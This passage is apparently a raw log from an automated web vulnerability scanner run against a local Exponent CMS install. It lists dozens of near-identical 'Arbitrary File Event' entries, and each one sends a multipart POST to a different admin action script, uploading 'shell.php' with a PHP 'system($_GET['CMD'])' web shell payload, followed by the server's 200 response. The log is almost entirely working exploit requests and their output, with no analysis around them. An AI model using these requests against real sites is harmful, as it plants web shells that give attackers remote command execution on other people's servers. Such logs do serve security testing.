DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/examplecontent.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:07 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/examplecontent.php?expid=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:08 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/finish_install_extension.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:08 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/gmgr_delete.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:08 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/gmgr_editprofile.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:08 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/gmgr_membership.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:08 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/gmgr_savegroup.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:09 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/gmgr_savemembers.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:09 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/groupaccounts.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:09 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/htmlarea_configs.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:09 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/htmlarea_deleteconfig.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:09 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/htmlarea_editconfig.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:10 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/htmlarea_saveconfig.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:10 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/installtables.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:10 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/install_extension.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:10 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/managemodules.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:10 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/managesubsystems.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:11 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/managethemes.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:11 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/modmgr_activate.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:11 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/optimizedatabase.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:11 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/orphanedcontent.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:12 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/orphanedcontent_delete.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:12 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/profileext_clear.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:12 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/profileext_delete.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:12 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/profileext_manage.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:12 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/profileext_order.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:13 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/profileext_save.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:13 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/remove_css.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:13 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/run.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:13 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/session_kick.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:13 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/session_kickuser.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:14 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/sysinfo.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:14 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/sysinfo_download.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:14 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/theme_preview.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:14 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/toggle_dev.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 